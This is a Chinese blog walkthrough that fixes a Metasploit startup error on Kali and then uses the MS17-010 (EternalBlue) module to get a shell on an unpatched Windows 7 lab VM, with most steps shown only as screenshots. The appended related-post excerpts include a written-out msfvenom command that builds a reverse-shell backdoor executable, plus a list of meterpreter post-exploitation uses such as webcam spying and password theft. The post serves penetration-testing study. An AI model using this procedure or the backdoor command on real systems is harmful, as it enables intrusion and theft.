kali metasploit-framework 安装_利用kali的msf功能对win7的漏洞成功利用并得到shell

最新推荐文章于 2023-07-10 10:29:55 发布
最新推荐文章于 2023-07-10 10:29:55 发布
阅读量628 收藏 4
点赞数
文章标签: kali metasploit-framework 安装 kali关闭防火墙 kali扫描不到wifi

(1). 打开metasploit的用户接口(msfconsole)

97a8881baf3085a89668b86dda1e9cf1.png

发现错误:You may need to uninstall or upgrade bundler

卸载或更新bundler?

解决错误:

通过一些命令来了解Kali 2020默认安装Metasploit框架的信息:

Kali基于Debian,使用Debian的包管理工具(类似CentOS的RPM)获得:

(1) . metasploit framework的版本号:

dpkg -l metasploit-framework
6d528fbb47aae215ba5936a644be34e2.png

(2). 查看框架的详细信息:

dpkg -s metasploit-framework
ef10ae555fad5f2062b5d0d40ec584ae.png

依赖库中包含: postgresql和bundler,但没有显示具体的版本号!!!

Kali 2020:默认安装bunlder的版本号:

191632a48191d6642951bae408a2df45.png

postgresql的版本号:

94046fd422679eb4c8a9a984a87457ca.png

因为错误提示,可能是bundler的版本问题,所以解决问题的关键是找到此版本的metasploit框架的依赖具体哪个版本号的bundler?

各种命令尝试找不到框架依赖的具体的bundler版本号!

百度的解决方法:

aeb8bf6410a51177e2a1f508623d5d38.png

想弄明白为什么是1.17.3,继续google:

google的解决方法:

29fa015464e5394eda405cd7647cce02.png

还是没有讲清楚哪里得知版本号是1.17.3,看来对待这个问题上,全世界的程序员是一个屌样,只告诉你这么做,不告诉你为什么要这样做!!!

放弃!!!

注意:gem是ruby的管理程序软件!

(3) . 按照2照做,成功启动msconsole:

d70d56a965e34a7d92041fb54b84dce9.png

出现警告问题:

因为metasploit使用到PostgreSQL作为数据库来进行数据初始化配置,所以需要启动它:

f25fe1886150371ef39d069c5bc42472.png

metasploit进行数据初始化:

fad83414726736edc7f4f9c282b389ca.png

退出msfconsole,重新登录:

be277d63eacdeed56998f4a389fcbfd5.png

(4) . 扫描ms17-010漏洞

80402085a4b06f5df6332b953a1a8b5a.png

(5). 使用ms17-010漏洞

c9ea7ba850fbf6613744b38474cb7e23.png

(6). 设置被攻击者主机的IP地址

fa32da20036e6964191eba2becfeb97f.png

(7). 启动攻击载荷进行入侵

cadfa79f1020dbecda1b65e58e479206.png

攻击载荷(Payload):目标系统在被渗透攻击之后可以执行的代码。

举例:反弹shell,bindshell等 ......

(8). 入侵失败

9af006e9ce46edba19644db3d0699f79.png

原因:漏洞补丁早已打上或被攻击主机防火墙打开了

(9). 不打补丁和关闭防护墙

虚拟机重新安装不打补丁的Win 7 ......

关闭防火墙:

098d98ced0970089681ce978f2c322ae.png

测试:

4232e4b62427ca190e73c42e00edfd0a.png
86648e623e30e767c98650c7376c2366.png
fe67177291d3432a90c5168b4b115a9b.png
9935312eada2b88b0c32f346b2f44107.png

Well Done!!!

weixin_39875675
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
docker-kali-msf-micro:带有 Kali + metasploitmsfconsole + postgresql 的 Docker 镜像 - 没有任何 metasploit 模块
06-24
安装了 metasploit 和 metasploit-frameworkKali Linux 基础镜像( 元包),但删除了所有的 metasploit 模块。 删除模块确实加快了 msfconsole 的启动速度。 换句话说,这是一个单一的 docker 容器,当它启动...
Kali Linux中的漏洞利用框架有哪些
沐尘而生的博客
08-28 204
Kali Linux作为一款专注于渗透测试和安全评估的操作系统,提供了多个流行的漏洞利用框架,用于测试和评估系统的安全性。Metasploit是最为知名和广泛使用的漏洞利用框架之一。它提供了大量的漏洞利用模块、payloads和辅助工具,帮助渗透测试人员评估系统的弱点。Exploit Database是一个包含各种漏洞利用和payload的仓库。虽然不是一个完整的框架,但 可以从这里获取现有的漏洞利用代码。SET是一个针对社会工程学攻击的框架,它可以帮助模拟钓鱼、恶意软件传播等攻击。
肥肠恐布--探索Kali Linux中的Metasploit Framework(MSF听说肾透大佬经常用)
weixin_51030879的博客
07-10 446
Metasploit Framework(MSF)是一款功能强大的漏洞利用工具,广泛用于网络渗透测试和安全评估。在Kali Linux中,Metasploit是一个集成的框架,为安全研究人员提供了一套丰富的工具和资源,以便于发现和利用系统中的漏洞。本篇博客将带您了解Metasploit的基本原理和使用方法。一、Metasploit Framework是一款开源的渗透测试和漏洞利用框架,由Rapid7开发和维护。它提供了一套功能强大的工具和资源,帮助安全研究人员评估和验证系统的安全性。
【网络安全】通过kali工具msfconsole利用ms17-010漏洞获取靶机shell以及远程登录
qq_68643282的博客
03-12 2056
通过kali工具msfconsole利用ms17-010漏洞获取靶机shell以及远程登录
关于更新Measploit后启动报错的问题
guangying177的博客
03-17 716
更新msf后报错: 报错代码如下: [*] Bundler failed to load and returned this error: ‘cannot load such file – bundler/setup’ [*] You may need to uninstall or upgrade bundler 解决方法: 1、进入msf根目录 cd /usr/share/metasploit...
永恒之蓝漏洞利用(MS17-010)获取shell 及获取靶机屏幕截图
沙罗沙罗的博客
05-09 3989
永恒之蓝漏洞利用(MS17-101) 文章目录永恒之蓝漏洞利用(MS17-101)一、永恒之蓝(MS17-101)介绍二、漏洞利用1.检测目标主机是否存在MS17-101漏洞2.使用msf攻击模块执行攻击总结 提示:以下是本篇文章正文内容,下面案例可供参考 一、永恒之蓝(MS17-101)介绍 漏洞名称:“永恒之蓝”漏洞 漏洞编号:MS17-010,CVE-2017 0143/0144/0145/0146/0147/0148 漏洞类型:缓冲区溢出漏洞 漏洞影响:信息泄露 CVSS评分:9.3(High)
kali执行msfconsole提示错误
随 风
08-20 776
kali执行msfconsole提示错误 [*] You may need to uninstall or upgrade bundler
【渗透实战】通过msf模块获取win7主机远程shell
yummy11111的博客
03-25 1091
渗透学习
kali linux-msf-ssh爆破
10-13
使用 nmap(-A -T4参数) metasploit (直接search 查找,然后 use利用就好了)本模块将测试SSH登录,在一系列的机器和报告成功登录。如果你有一个数据库加载插件和连接到一个数据库,该模块会记录成功登录和HOSTS使...
docker-kali-msf:带有 Kali + metasploitmsfconsole + postgresql 的 Docker 镜像
06-24
安装了 metasploit 和 metasploit-frameworkKali Linux 基础镜像( 元包)。 换句话说,这是一个单一的 docker 容器,当它启动时,将启动带有 postgresql 和 metasploit 框架的 Kali linux 机器,并将您放入 ...
kali linux msf系列视频教程
10-25
kali msf 系列 第四章利用快捷方式漏洞进行渗透提权 kali msf 系列 第五章利用PDF渗透提权 kali msf 系列 第六章爆破模块讲解 kali msf 系列 第七章木马生成 kali msf 系列 第八章木马免杀 kali msf 系列 第九章...
msf-autopwn:自动利用野生环境中的一些最常见漏洞
05-11
安装安装仅在Kali上进行了测试。 克隆到仓库中,输入克隆的文件夹并运行install.sh。 打开一个新的终端,并使用随附的rc文件启动metasploit。 回到原始终端,继续使用pipenv进入新创建的虚拟环境。 最后,输入随附...
Kali操作系统上使用metasploit
weixin_55280439的博客
03-29 3071
meterpreter 是强大的后渗透模块,可以输入help 查看帮助信息,远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统.......这些看起来非常复杂又高级的操作都能用meterpreter 中的一行或几个字母,简单的命令完成。[*Payload 是攻击载荷,就是攻击完成后想获取的东西,这里是想获取 meterpreter](注:显示攻击失败表示目标主机上没有此漏洞,此漏洞只适用于攻击自己的win7靶机,高版本的系统已经修复此漏洞,显示WIN 表示攻击成功,其他则是失败)
Kali渗透测试:使用工具Metasploit攻击操作系统
Liu_Bruce的博客
05-12 6416
Kali渗透测试:使用工具Metasploit攻击操作系统 如果在目标系统上发现了漏洞之后,接下来就是要利用漏洞渗透工具对目标系统进行攻击。Metasploit是目前非常优秀的一款漏洞渗透工具。 1.1 Metasploit基础 2003年左右,H.D Moore和Spoonm 创建了一个集成了多个漏洞渗透工具的框架。随后, 这个框架在2004年的Black Hat Briefings 会议上备受关注,Spoonm在大会的演讲中提到,Metasploit的使用非常简单,以至于你只需要找到一个目标,多次单击鼠
第三期_Metasploit 介绍《Metasploit Unleashed Simplified Chinese version(Metasploit官方文档教程中文版)》
Sno_WolF的博客
02-04 589
三、介绍 1. METASPLOIT UNLEASHED 的需求 准备您的 Metasploit 实验室环境 在学习如何使用 Metasploit 框架之前,我们首先需要确保我们的设置将满足或超过以下各节中概述的系统要求。花时间正确准备您的Metasploit实验室环境将有助于在课程后期出现之前消除许多问题。我们强烈建议使用能够运行多个系统的系统虚拟机以托管您的实验室。 2. METASPLOIT UNLEASHED 的硬件需求 下面列出的所有值都是估计值或建议值。在某些情况下,你可以逃脱更少的惩罚,但要
Kali利用MSF渗透Win 7获取shell
舞指如歌~的博客
09-13 3322
首先在kali上制作一个后门程序,文件名为:setup.exe msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=5050 -f exe -o setup.exe #本地监听地址及端口号:192.168.1.100:5050 为生成的文件 setup.exe 赋予可执行的权限,如果有必要可以对该文件执...
kali使用Metasploit Framework(msf)获取shell
Mrw的博客
04-05 2754
简介 Metasploit Framework是一个编写,测试和使用exploit代码的完善环境。这个环境为渗透测试,shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Ruby编程语言编写的,并带有由C语言,汇编程序和Python编写的可选组件。 Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插...
kali 2020-1-20升级metasploit-framework
leoriclee的博客
04-25 548
kali2020-01-20用了也有一段时间了,今天学习python要用到msf,心血来潮想升级一下metasploit-framework,说(忘)干(记)就(镜)干(像) apt-get install metasploit-framework msf升级很顺利,结果再查看版本时报错,WTF 不想重新复制备份的VM,所以只好硬头皮修复问题,于是就有了这篇作品 首先 根据报错提示,执行bundle install,咣当,又报错了 然后 好吧,不能用root,那就用小kali吧,再报错找不到Gemfil
JavaScript_构建您的第一个移动应用程序.zip
最新发布
05-20
JavaScript
kali 如何安装metasploit
06-06
4. 进入 Metasploit 目录并运行以下命令以安装所有必要的组件:`cd metasploit-framework && bundle install` 5. 运行以下命令以为 PostgreSQL 创建一个新用户:`sudo -u postgres createuser msf -P -S -R -D` 6. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值